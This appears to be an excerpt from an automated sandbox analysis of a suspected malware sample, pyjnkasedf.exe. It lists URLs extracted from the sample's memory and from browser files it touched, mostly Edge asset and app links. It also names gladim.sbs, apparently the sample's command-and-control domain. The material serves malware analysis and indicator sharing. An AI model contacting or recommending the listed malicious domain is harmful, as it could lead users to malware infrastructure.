            Source: pyjnkasedf.exe, 00000000.00000002.2025435836.00000000037D0000.00000004.00000020.00020000.00000000.sdmp, pyjnkasedf.exe, 00000000.00000002.2024724146.0000000003642000.00000004.00000020.00020000.00000000.sdmp, AFHDHC.0.dr, Web Data.15.dr, IDBKFH.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: pyjnkasedf.exe, 00000000.00000002.2025435836.00000000037D0000.00000004.00000020.00020000.00000000.sdmp, pyjnkasedf.exe, 00000000.00000002.2024724146.0000000003642000.00000004.00000020.00020000.00000000.sdmp, AFHDHC.0.dr, Web Data.15.dr, IDBKFH.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: 4dc7e5a3-b915-4af4-a840-9d0cb873b8e0.tmp.16.drString found in binary or memory: https://edgeassetservice.azureedge.net
            Source: 000003.log3.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/addressbar_uu_files.en-gb/1.0.2/asset?sv=2017-07-29&sr
            Source: 000003.log3.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit
            Source: 000003.log3.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr
            Source: 000003.log4.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtrac
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_163_music.png/1.0.3/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_dark.png/1.7.32/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_hc.png/1.7.32/asset
            Source: HubApps Icons.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass
            Source: HubApps Icons.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_amazon_music_light.png/1.4.13/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_apple_music.png/1.4.12/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_bard_light.png/1.0.1/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.6.8/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.6.8/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.6.8/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_hc.png/1.0.3/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_dark.png/1.0.3/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_light.png/1.0.3/asse
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_deezer.png/1.4.12/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_dark.png/1.0.6/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_light.png/1.0.6/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_color.png/1.0.14/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_hc.png/1.0.14/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_hc.png/1.1.12/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_dark.png/1.1.12/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.dr, HubApps Icons.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_hc.png/1.2.0/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_dark.png/1.2.0/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_light.png/1.2.0/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_excel.png/1.7.32/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_facebook_messenger.png/1.5.14/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gaana.png/1.0.3/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc.png/1.7.1/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_controller.png/1.7.1/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_joystick.png/1.7.1/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark.png/1.7.1/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_controller.png/1.7.1/
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_joystick.png/1.7.1/as
            Source: HubApps Icons.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_controller.png/1.7.1
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_joystick.png/1.7.1/a
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gmail.png/1.5.4/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_help.png/1.0.0/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_hc.png/0.1.3/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_dark.png/0.1.3/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_light.png/0.1.3/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_iHeart.png/1.0.3/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_hc.png/1.0.14/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_dark.png/1.0.14/as
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_light.png/1.0.14/a
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_instagram.png/1.4.13/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_ku_gou.png/1.0.3/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_last.png/1.0.3/asset
            Source: 000003.log3.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Sho
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_dark.png/1.1.0/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_hc.png/1.1.0/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_light.png/1.1.0/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_naver_vibe.png/1.0.3/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_dark.png/1.4.9/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_hc.png/1.4.9/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_light.png/1.4.9/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_dark.png/1.9.10/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_hc.png/1.9.10/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.dr, HubApps Icons.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_hc.png/1.1.0/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_dark.png/1.1.0/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_light.png/1.1.0/asse
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_power_point.png/1.7.32/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_qq.png/1.0.3/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_dark.png/1.1.12/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_hc.png/1.1.12/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_light.png/1.1.12/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_hc.png/1.1.3/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_dark.png/1.1.3/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_light.png/1.1.3/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_hc.png/1.3.6/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_dark.png/1.3.6/asset
            Source: HubApps Icons.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.1.12/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.4.0/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.5.13/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.1.12/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.4.0/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.5.13/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.1.12/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.4.0/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.5.13/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_hc.png/1.4.0/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_dark.png/1.4.0/asset
            Source: HubApps Icons.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_dark.png/1.3.20/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_hc.png/1.3.20/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_light.png/1.3.20/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_sound_cloud.png/1.0.3/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_spotify.png/1.4.12/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_dark.png/1.2.19/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_hc.png/1.2.19/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_light.png/1.2.19/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_telegram.png/1.0.4/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_hc.png/1.0.5/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_dark.png/1.0.5/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_light.png/1.0.5/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tidal.png/1.0.3/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tik_tok_light.png/1.0.5/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_hc.png/1.5.13/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_dark.png/1.5.13/asset
            Source: HubApps Icons.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_twitter_light.png/1.0.9/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_vk.png/1.0.3/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whats_new.png/1.0.0/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whatsapp_light.png/1.4.11/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_word.png/1.7.32/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_yandex_music.png/1.0.10/asset
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_youtube.png/1.4.14/asset
            Source: 000003.log3.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/signal_triggers/1.13.3/asset?sv=2017-07-29&sr=c&sig=Nt
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://excel.new?from=EdgeM365Shoreline
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://gaana.com/
            Source: pyjnkasedf.exe, 00000000.00000003.1340492383.000000000093E000.00000004.00000020.00020000.00000000.sdmp, pyjnkasedf.exe, 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://gladim.sbs
            Source: pyjnkasedf.exe, 00000000.00000003.1363743544.000000000093E000.00000004.00000020.00020000.00000000.sdmp, pyjnkasedf.exe, 00000000.00000003.1410242724.000000000093D000.00000004.00000020.00020000.00000000.sdmp, pyjnkasedf.exe, 00000000.00000003.1386748525.000000000093E000.00000004.00000020.00020000.00000000.sdmp, pyjnkasedf.exe, 00000000.00000003.1340492383.000000000093E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gladim.sbs/
            Source: pyjnkasedf.exe, 00000000.00000003.1363743544.000000000093E000.00000004.00000020.00020000.00000000.sdmp, pyjnkasedf.exe, 00000000.00000003.1410242724.000000000093D000.00000004.00000020.00020000.00000000.sdmp, pyjnkasedf.exe, 00000000.00000003.1386748525.000000000093E000.00000004.00000020.00020000.00000000.sdmp, pyjnkasedf.exe, 00000000.00000003.1340492383.000000000093E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gladim.sbs/$
            Source: pyjnkasedf.exe, 00000000.00000003.1410242724.000000000093D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gladim.sbs/)
            Source: pyjnkasedf.exe, 00000000.00000003.1386748525.000000000093E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gladim.sbs/5
            Source: pyjnkasedf.exe, 00000000.00000003.1410242724.000000000093D000.00000004.00000020.00020000.00000000.sdmp, pyjnkasedf.exe, 00000000.00000003.1386748525.000000000093E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gladim.sbs/S
            Source: pyjnkasedf.exe, 00000000.00000002.2023659585.000000000092E000.00000004.00000020.00020000.00000000.sdmp, pyjnkasedf.exe, 00000000.00000003.1363743544.000000000093E000.00000004.00000020.00020000.00000000.sdmp, pyjnkasedf.exe, 00000000.00000003.1410242724.000000000093D000.00000004.00000020.00020000.00000000.sdmp, pyjnkasedf.exe, 00000000.00000003.1386748525.000000000093E000.00000004.00000020.00020000.00000000.sdmp, pyjnkasedf.exe, 00000000.00000003.1340492383.000000000093E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gladim.sbs/U
            Source: pyjnkasedf.exe, 00000000.00000003.1363743544.000000000093E000.00000004.00000020.00020000.00000000.sdmp, pyjnkasedf.exe, 00000000.00000003.1410242724.000000000093D000.00000004.00000020.00020000.00000000.sdmp, pyjnkasedf.exe, 00000000.00000003.1386748525.000000000093E000.00000004.00000020.00020000.00000000.sdmp, pyjnkasedf.exe, 00000000.00000003.1340492383.000000000093E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gladim.sbs/Y
            Source: pyjnkasedf.exe, 00000000.00000003.1410242724.000000000093D000.00000004.00000020.00020000.00000000.sdmp, pyjnkasedf.exe, 00000000.00000003.1386748525.000000000093E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gladim.sbs/a
            Source: pyjnkasedf.exe, 00000000.00000003.1363743544.000000000093E000.00000004.00000020.00020000.00000000.sdmp, pyjnkasedf.exe, 00000000.00000003.1410242724.000000000093D000.00000004.00000020.00020000.00000000.sdmp, pyjnkasedf.exe, 00000000.00000003.1386748525.000000000093E000.00000004.00000020.00020000.00000000.sdmp, pyjnkasedf.exe, 00000000.00000003.1340492383.000000000093E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gladim.sbs/k
            Source: pyjnkasedf.exe, 00000000.00000003.1363743544.000000000093E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gladim.sbs/y
            Source: pyjnkasedf.exe, 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://gladim.sbsDGCBGII
            Source: pyjnkasedf.exe, 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmp, pyjnkasedf.exe, 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://gladim.sbsosh;
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://i.y.qq.com/n2/m/index.html
            Source: 2cc80dabc69f58b6_1.15.drString found in binary or memory: https://img-s-msn-com.akamaized.net/
            Source: 2cc80dabc69f58b6_1.15.drString found in binary or memory: https://img-s.msn.cn/tenant/amp/entityid/
            Source: HIDHIE.0.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqrfQHr4pbW4ZbWfpbY7ReNxR3UIG8zInwYIFIVs9eYi
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://latest.web.skype.com/?browsername=edge_canary_shoreline
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://m.kugou.com/
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://m.soundcloud.com/
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://m.vk.com/
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://mail.google.com/mail/mu/mp/266/#tl/Inbox
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://manifestdeliveryservice.edgebrowser.microsoft-staging-falcon.io/app/page-context-demo
            Source: Cookies.16.drString found in binary or memory: https://msn.comXID/
            Source: Cookies.16.drString found in binary or memory: https://msn.comXIDv10
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://music.amazon.com
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://music.apple.com
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://music.yandex.com
            Source: 2cc80dabc69f58b6_1.15.drString found in binary or memory: https://ntp.msn.cn/edge/ntp
            Source: 000003.log8.15.dr, 2cc80dabc69f58b6_0.15.drString found in binary or memory: https://ntp.msn.com
